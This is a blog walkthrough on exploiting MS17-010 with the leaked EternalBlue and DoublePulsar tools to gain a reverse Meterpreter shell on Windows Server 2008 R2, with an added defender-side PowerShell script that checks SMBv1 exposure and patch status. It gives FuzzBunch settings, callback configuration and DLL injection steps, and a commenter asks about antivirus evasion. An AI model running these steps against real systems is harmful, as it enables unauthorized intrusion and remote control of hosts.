by James Smith

Exploiting MS17-010 – Using EternalBlue and DoublePulsar to gain a remote Meterpreter shell

This walkthrough assumes you know a thing or two and won't go into major detail. After all, it's meant for fellow researchers and penetration testers.

Findings so far…

These are the findings from using these tools so far:

Note: The default process that DoublePulsar injects into is 'lsass'. Whilst testing against Windows 2008 R2 SP1 it was observed that this caused the 'lsass' process to become unstable over time, resulting in some cases in a BSOD.

  • No domain is needed for the tools to work.
  • An active user session is also not needed.
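The two findings above (and the lsass note) are what a defender needs to act on: the exploit needs nothing but a reachable SMBv1 service, and the default injection target is a process whose crash takes the host down. The script below is an added example written for this post's readers and is not part of the original post or of the tools it describes; it is meant to be run elevated on the Windows 7 / Server 2008 R2 host you are assessing. The KB numbers are an assumption on my part (the security-only and monthly-rollup MS17-010 updates for that platform) and should be checked against the Microsoft bulletin for your exact build before a "patched" result is trusted.

```powershell
# Added example, not from the original post: defender-side check for the exposure this walkthrough relies on.
# Assumptions: Windows 7 SP1 / Server 2008 R2 SP1 host, elevated PowerShell 2.0 or later.
# KB4012212 (security-only) and KB4012215 (monthly rollup) are the MS17-010 updates I believe apply to that
# platform; verify against the bulletin for your build.
$Ms17010Updates = @('KB4012212', 'KB4012215')

function Test-Smb1Enabled {
    # 2008 R2 has no Get-SmbServerConfiguration; SMBv1 is controlled by this registry value.
    # An absent value means SMBv1 is enabled, which is the default on that platform.
    $key = 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters'
    $val = Get-ItemProperty -Path $key -Name 'SMB1' -ErrorAction SilentlyContinue
    if ($null -eq $val) { return $true }
    return ($val.SMB1 -ne 0)
}

function Test-Ms17010Patched {
    # Any one of the listed updates closes the SMBv1 bug used by EternalBlue.
    $installed = Get-HotFix -ErrorAction SilentlyContinue | Select-Object -ExpandProperty HotFixID
    foreach ($kb in $Ms17010Updates) {
        if ($installed -contains $kb) { return $true }
    }
    return $false
}

function Test-Smb445Listening {
    # Test-NetConnection does not exist on 2008 R2, so fall back to netstat.
    $lines = netstat -ano | Select-String ':445\s' | Select-String 'LISTENING'
    return ($lines.Count -gt 0)
}

function Get-LsassCrashEvents {
    # The post observed lsass becoming unstable after injection. A user-mode lsass fault is logged as
    # Application Error (Event ID 1000) naming lsass.exe; it is a symptom worth alerting on because an
    # lsass crash forces a reboot and lsass is not a process that should ever be faulting.
    param([int]$Days = 7)
    $filter = @{ LogName = 'Application'; Id = 1000; StartTime = (Get-Date).AddDays(-$Days) }
    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue |
        Where-Object { $_.Message -match 'lsass\.exe' } |
        Select-Object TimeCreated, Id, Message
}

$smb1      = Test-Smb1Enabled
$patched   = Test-Ms17010Patched
$listening = Test-Smb445Listening

Write-Host ("SMBv1 enabled      : {0}" -f $smb1)
Write-Host ("MS17-010 installed : {0}" -f $patched)
Write-Host ("TCP 445 listening  : {0}" -f $listening)

if ($listening -and $smb1 -and -not $patched) {
    Write-Warning 'Host is exposed to MS17-010: SMBv1 reachable and unpatched. Patch, or disable SMBv1 and reboot.'
}

$crashes = @(Get-LsassCrashEvents -Days 7)
if ($crashes.Count -gt 0) {
    Write-Warning ("{0} lsass.exe fault(s) in the Application log in the last 7 days; investigate." -f $crashes.Count)
    $crashes | Format-List
}
```

Disabling SMBv1 on this platform is a registry change (set the `SMB1` value under the key above to 0) followed by a reboot; the check deliberately treats a missing value as "enabled" because that is the platform default, which is exactly the state the walkthrough's target was in.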

Fuzzbunch setup

Firstly, we need to set up our environment for the ShadowBrokers tools to run in.

In my case I created a Windows 7 VM for the task.

Prerequisites for this exercise are

Once your environment is set up and you have downloaded the ShadowBrokers archive, unzip it to a path of your choice.

In this instance I chose the root of the C: drive.

We then need to edit a few of the files to work with our environment, as on first run you will otherwise receive various error messages.

Firstly, we need to edit the "fb.py" file located in the /windows folder and comment out the line below.

Save the file and open up "Fuzzbunch.xml". You now need to change the "ResourcesDir" and "LogDir" paths to match those of your environment.

Note: If there is no log directory then please create it and add the path.

We should now be ready to run the Fuzzbunch tool.

Launch a command prompt and navigate to the /windows folder inside the ShadowBrokers folder.

Type the below command and hit return.

fb.py

FuzzBunch should now be running in your command prompt, as in the screenshot below.

Listener and Payload

Now we need to set up our Linux attack box. For the purpose of this post I'll be using a Kali rolling VM with Metasploit installed.

Let's go ahead and launch Metasploit, then create a DLL payload and a listener.

The target I am attacking is an x64 Windows Server 2008 R2 system, so I set up the following payload and saved it as shown in the screenshot below.

Now for the handler: an x64 reverse TCP Meterpreter.

We’ll run the handler and move on to the next step.

The payload you created now needs copying over to the virtual machine where FuzzBunch is sitting and waiting.

Back to Fuzzbunch

Let’s return to our Windows VM.

We can now start entering our details into the FuzzBunch tool.

For most settings we can accept the defaults; the ones that do need changing are below.

[?] Default Target IP Address [] : Your Target's IP
[?] Default Callback IP Address [] : Your VM's IP
[?] Use Redirection [yes] : NO
[?] Base Log directory [c:\logs] : Input your log path
Index     Project
-----     -------
0         Create a New Project
[?] Project [0] : 0
[?] New Project Name : Give your project a name

Now that our initial variables are set, you should be at the fb prompt.


Launching the exploit plugin

Launch the EternalBlue module.

use eternalblue

Again, we can accept all defaults except the below.

[*]  Mode :: Delivery mechanism

    0) DANE     Forward deployment via DARINGNEOPHYTE
   *1) FB       Traditional deployment from within FUZZBUNCH

[?] Mode [0] : 1

Change the above from its default setting of "0" to "1". You can then execute the exploit. (Some details from my test have been redacted for security.)


Injecting our DLL payload

Now that the tool has placed the backdoor on the vulnerable system, we can move on to running DoublePulsar, which will inject our DLL payload.

use doublepulsar

Once again we can accept most of the defaults, just change the variables below.

[*]  Architecture :: Architecture of the target OS

    0) x86     x86 32-bits
   *1) x64     x64 64-bits

The above setting defaults to x86 and needs changing to x64.

[+] Set Architecture => x64

[*]  Function :: Operation for backdoor to perform

   *0) OutputInstall     Only output the install shellcode to a binary file on diskisk.
    1) Ping              Test for presence of backdoor
    2) RunDLL            Use an APC to inject a DLL into a user mode process.
    3) RunShellcode      Run raw shellcode
    4) Uninstall         Remove's backdoor from system

[?] Function [0] :

We need to select option "2" so that we can use our newly created DLL payload.

Next, we need to enter the path to our DLL file.

[*]  DllPayload :: DLL to inject into user mode

[?] DllPayload [] : PathToOurDLL

All other variables can be left at their default values, and you can proceed to execute the plugin.


Hack all the things!

If everything has been successful you should now have a Meterpreter shell waiting on your attack box.

Note: If you don't have a shell yet then something has obviously gone wrong. Check your steps and leave a comment, and I will try and help you through it.


22 thoughts on "Exploiting MS17-010 – Using EternalBlue and DoublePulsar to gain a remote Meterpreter shell"

    1. Hi JC, I am still investigating what causes the lsass process to crash. It could be due to other pieces of software/services running on this particular host.

  1. Thanks, do you use any kind of encoder to evade antivirus software? And can this exploit be used against other processes or only against lsass?

  2. Only Darkpulsar is available, there is no doublepulsar.
    I have used many git sources of fuzzbunch, some even don't have the option of Eternalblue itself!!! Please help

    1. Hi, after writing this article a Metasploit module was created which works very well. There shouldn't be a need to use the original tools anymore. Hope this helps and thanks for reaching out!
